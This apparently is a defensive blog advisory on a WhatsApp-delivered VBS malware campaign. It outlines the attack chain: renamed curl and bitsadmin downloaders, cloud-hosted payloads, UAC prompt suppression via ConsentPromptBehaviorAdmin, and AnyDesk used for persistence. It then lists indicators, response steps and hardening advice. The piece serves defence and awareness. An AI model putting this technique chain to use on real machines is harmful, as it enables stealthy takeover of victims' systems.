WhatsApp VBS Malware: How Attackers Hijack Windows with a UAC Bypass (and What to Do Next)
WhatsApp VBS malware is the latest Windows threat Microsoft is warning about in 2026, and it is a nasty one. Attackers use WhatsApp messages to deliver malicious VBS files, then try to bypass UAC, hide inside normal-looking Windows activity, and take control of the system. If you use Windows at work or at home, this is the kind of attack you need to understand fast.
What makes this campaign stand out is not just the WhatsApp lure. It is the full chain. The attacker relies on social engineering, renamed Microsoft and Windows utilities, downloads from trusted cloud services, registry changes, and unsigned MSI installers to build long-term access. That mix makes the attack harder to spot than a simple attachment scam.
Why this WhatsApp malware matters in 2026
Microsoft says the campaign started in late February 2026. The delivery method is simple on the surface: a victim receives a malicious Visual Basic Script file through WhatsApp and runs it. From there, the malware kicks off a multi-stage infection chain focused on three goals:
- persistence
- remote access
- privilege escalation
That means the attack is not just trying to run once and disappear. It is trying to stay on your Windows device, raise its privileges, and give the attackers a way back in later.
One thing Microsoft noted is especially interesting: the exact social engineering lure is still unclear. In plain English, defenders know the delivery path, but they do not yet know the specific message themes being used to convince people to click and run the file.
How attackers use WhatsApp to start the attack
The first stage depends on one basic thing: getting you to execute a VBS file.
That matters because VBS files can still trigger dangerous actions on Windows when script hosts are allowed to run. Once the file is opened, the malware starts preparing the system for follow-on payloads.
According to Microsoft, the script does a few important things right away:
- creates hidden folders in
C:\ProgramData - drops renamed legitimate Windows utilities
- uses those tools to pull more payloads from the internet
The renamed tools are a big part of the trick. Microsoft observed:
curl.exerenamed asnetapi.dllbitsadmin.exerenamed assc.exe
That is clever because these are legitimate utilities, just dressed up with misleading names. To a busy admin or an untrained user, the activity may not look obviously malicious at first glance.
The stealth trick: renamed Windows tools and hidden folders
This is where the campaign starts to feel more serious.
Instead of dropping a loud, obvious malware binary, the attackers use living-off-the-land techniques. They lean on tools that already exist in Windows or look like they belong there. They also place files in hidden folders under C:\ProgramData, which is a location many users never inspect.
Microsoft also highlighted a useful detection clue. Even when the attacker renames utilities on disk, the binaries can still keep their original PE metadata. So a file named something innocent or misleading may still carry an OriginalFileName value showing it is really curl.exe or bitsadmin.exe.
That mismatch is worth hunting for.
For example, if your telemetry shows a file named netapi.dll acting like a downloader and its original metadata points to curl.exe, that is not normal. It is a strong signal that something is off.
How payloads are downloaded from trusted cloud services
After the initial foothold, the malware downloads extra VBS payloads from trusted cloud services. Microsoft specifically named:
- AWS S3
- Tencent Cloud
- Backblaze B2
This part matters because defenders often allow traffic to major cloud providers. In many environments, outbound connections to these platforms are common. That gives attackers cover.
Microsoft described secondary payloads such as:
auxs.vbsWinUpdate_KB5034231.vbs
On paper, those names can look routine enough to slip past a quick review. In practice, they are part of the attack chain.
This is one of those details I always come back to: trusted platforms are not automatically safe content sources. If your team treats all cloud traffic as harmless, you give attackers room to work.
How attackers bypass UAC and hijack Windows
Now we get to the part most people care about: Attackers bypass UAC to gain elevated control over Windows.
Microsoft says the malware tampers with User Account Control settings and repeatedly attempts to launch cmd.exe with elevated privileges. It keeps retrying until the UAC elevation succeeds or the process is stopped.
That repeated behavior is important. This is not a single casual attempt. It is an active effort to weaken defenses and take administrative control.
The malware also modifies registry entries under:
HKLM\Software\Microsoft\Win
Microsoft further noted that the campaign modifies ConsentPromptBehaviorAdmin to suppress UAC prompts. In practical terms, that helps the attacker gain elevated privileges without normal user interaction.
If you are wondering why this matters so much, here is the simple answer: once an attacker gets elevated rights, cleanup gets harder. They can change more settings, install more tools, survive reboots, and make your Windows machine feel normal while it is no longer fully yours.
Persistence after reboot: what the malware does next
The campaign does not stop after privilege escalation. It embeds persistence mechanisms so the infection survives system reboots.
That means restarting the PC will not solve the problem.
This is where many users get caught. They notice a weird process, reboot, and assume the issue is gone. But Microsoft says the malware is built to maintain long-term access.
The final stage includes malicious, unsigned MSI packages, including:
Setup.msiWinRAR.msiLinkPoint.msiAnyDesk.msi
The unsigned part is key. Legitimate software installers often carry valid code signing certificates. Unsigned MSI files in a chain like this deserve immediate attention.
Why AnyDesk appears in the final stage
Microsoft said the campaign includes remote access software, specifically AnyDesk, to provide persistent remote access.
That opens the door to:
- data exfiltration
- hands-on keyboard activity by the attacker
- additional malware deployment
- long-term surveillance of the infected system
A lot of people think of remote access tools as safe by default because IT teams use them every day. But in the wrong hands, they become an easy backdoor.
So if you see an unexpected AnyDesk install after suspicious script activity, treat it as a major incident, not a small software oddity.
Indicators security teams should watch for
If you defend Windows endpoints, here are some of the strongest behavior-based signals from Microsoft's findings:
- WhatsApp-delivered
.vbsfiles being executed wscript.exeorcscript.exelaunching suspicious VBS scripts- hidden folders created under
C:\ProgramData - renamed legitimate utilities such as
curl.exeandbitsadmin.exe - PE metadata mismatches between file name and
OriginalFileName - downloader-style command-line flags on renamed utilities
- outbound traffic to AWS S3, Tencent Cloud, or Backblaze B2 tied to suspicious script execution
- repeated attempts to elevate
cmd.exe - registry changes under
HKLM\Software\Microsoft\Win - changes to
ConsentPromptBehaviorAdmin - unsigned MSI installers dropped and executed
- unexpected installation of AnyDesk
- traffic to known domains like
Neescil[.]topandvelthora[.]top
What to do next if you suspect infection
If you think one of your systems was hit, move fast.
1. Isolate the Windows device
Disconnect it from the network right away. If the attacker has remote access, every extra minute matters.
2. Preserve evidence
Do not start deleting files at random. Save logs, running process data, registry snapshots, and network telemetry if you can. Your security team may need that data to understand the full chain.
3. Hunt for the early signs
Check for:
- VBS files launched from user-download or messaging-related paths
- hidden directories in
C:\ProgramData - renamed versions of
curl.exeandbitsadmin.exe - suspicious MSI files
- AnyDesk installations the user did not request
4. Review UAC-related registry settings
Pay close attention to changes under HKLM\Software\Microsoft\Win and settings tied to ConsentPromptBehaviorAdmin.
5. Block known infrastructure
If your controls allow it, block direct access to known malicious domains and any identified URLs from threat intelligence tied to this campaign.
6. Reset credentials and review access
If the attacker gained elevated rights, assume credentials may be exposed. Reset impacted credentials and review admin activity carefully.
7. Rebuild if needed
If persistence is confirmed, a clean rebuild may be the safest path. In many cases, that is faster and more reliable than trying to trust a heavily tampered Windows install.
How to protect your organization from WhatsApp malware
Microsoft's guidance points to a few practical defenses that can reduce risk.
Restrict script hosts
Block or tightly control:
wscript.execscript.exemshta.exe
especially when they run from untrusted paths.
Monitor for renamed Windows utilities
Look for binaries whose on-disk names do not match their original metadata. This is one of the sharper detection angles in this campaign.
Watch cloud traffic more closely
Do not assume AWS, Tencent Cloud, or Backblaze B2 traffic is always benign. Add inspection and alerting for suspicious downloads tied to script execution.
Detect persistence and UAC tampering
Alert on repeated UAC-related registry changes and privilege escalation attempts. Repeated elevation tries should stand out in a healthy environment.
Turn on Microsoft Defender protections
Microsoft recommends enabling protections such as:
- cloud-delivered protection in Microsoft Defender Antivirus
- Edge and SmartScreen protections
- EDR in block mode for Defender for Endpoint
- network protection and web protection
- tamper protection
- attack surface reduction rules to block obfuscated scripts
- rules to block VBScript or JavaScript from launching downloaded executable content
Train users on WhatsApp social engineering
People often treat messaging apps as casual and safe. That is exactly why this delivery method works. Teach users to treat WhatsApp attachments and file requests like email attachments from strangers.
A quick plain-English summary of the attack chain
If you want the short version, here it is:
- The attacker sends a malicious VBS file through WhatsApp.
- The victim runs it on Windows.
- The script creates hidden folders and drops renamed legitimate tools.
- Those tools download more payloads from trusted cloud services.
- The malware tampers with UAC and tries to elevate privileges.
- It changes registry settings and adds persistence.
- It deploys unsigned MSI installers.
- It enables remote access, including through AnyDesk.
That is why this is more than just a phishing message. It is a full takeover chain.
FAQ
What is WhatsApp VBS malware?
WhatsApp VBS malware is a Windows-focused attack campaign in which attackers send malicious Visual Basic Script files through WhatsApp messages. When the victim runs the script, it starts a multi-stage infection chain that can lead to persistence, remote access, and privilege escalation.
How do attackers bypass UAC in this campaign?
Microsoft says the malware tampers with UAC settings, repeatedly tries to launch cmd.exe with elevated privileges, and modifies registry values including ConsentPromptBehaviorAdmin. The goal is to suppress prompts and gain elevated access without normal user interaction.
Why do trusted cloud services matter in this attack?
The attackers host payloads on AWS S3, Tencent Cloud, and Backblaze B2. Because many organizations trust or allow traffic to these platforms, malicious downloads can blend in with ordinary network activity.
What Windows artifacts should I check first?
Start with hidden folders in C:\ProgramData, suspicious VBS execution through wscript.exe or cscript.exe, renamed utilities like netapi.dll and sc.exe, registry changes under HKLM\Software\Microsoft\Win, unsigned MSI files, and unexpected AnyDesk installations.
Is AnyDesk malware?
No. AnyDesk itself is legitimate remote access software. In this campaign, attackers abuse it as a persistence and remote-control tool. The problem is the unauthorized installation and use, not the brand alone.
What should I do if a user opened the VBS file?
Isolate the system, preserve logs and evidence, investigate for persistence and UAC changes, review outbound cloud traffic, remove unauthorized remote access tools, reset affected credentials, and consider a full rebuild if administrative compromise is confirmed.
Final thoughts
The big lesson from this 2026 campaign is simple: attackers do not always need exotic malware to hijack Windows. Sometimes they just need a message on WhatsApp, a VBS file, a few renamed utilities, and a path around UAC.
Microsoft's warning is a good reminder that legitimate tools and trusted platforms can still be part of a dangerous attack. If you tighten script controls, monitor cloud downloads, and treat messaging-based file delivery seriously, you give yourself a much better chance of stopping this kind of WhatsApp malware before it turns into a full system takeover.
